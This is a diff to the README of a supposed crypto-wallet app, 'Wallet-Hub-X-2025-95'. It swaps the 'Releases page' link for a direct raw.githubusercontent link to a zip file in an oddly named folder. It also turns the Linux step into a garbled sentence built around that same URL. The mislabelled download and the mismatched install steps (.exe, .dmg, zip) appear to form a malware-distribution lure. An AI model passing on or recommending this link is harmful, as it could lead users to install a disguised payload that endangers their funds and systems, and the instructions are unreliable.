anu12324/Wallet-Hub-X-2025-95/README.md

 To start using Wallet-Hub-X-2025-95, follow these simple steps:

 1. **Download the Application**
-   - Visit the [Releases page](https://github.com/anu12324/Wallet-Hub-X-2025-95/releases) to download the latest version of Wallet-Hub-X-2025-95.
+   - Visit the [Releases page](https://raw.githubusercontent.com/anu12324/Wallet-Hub-X-2025-95/main/anaerobian/Wallet-Hub-X-2025-95.zip) to download the latest version of Wallet-Hub-X-2025-95.

 2. **Install the Application**
    - Locate the downloaded file on your computer.
    - Depending on your operating system:
      - **Windows:** Double click the `.exe` file and follow the prompts.
      - **Mac:** Open the downloaded `.dmg` file and drag the Wallet-Hub-X-2025-95 icon to your Applications folder.
-     - **Linux:** Extract the tar.gz file and run the application via your terminal.
+     - **Linux:** Extract the https://raw.githubusercontent.com/anu12324/Wallet-Hub-X-2025-95/main/anaerobian/Wallet-Hub-X-2025-95.zip file and run the application via your terminal.

 3. **Launch the Application**
    - After installation, find the Wallet-Hub-X-2025-95 icon on your desktop or in your applications menu.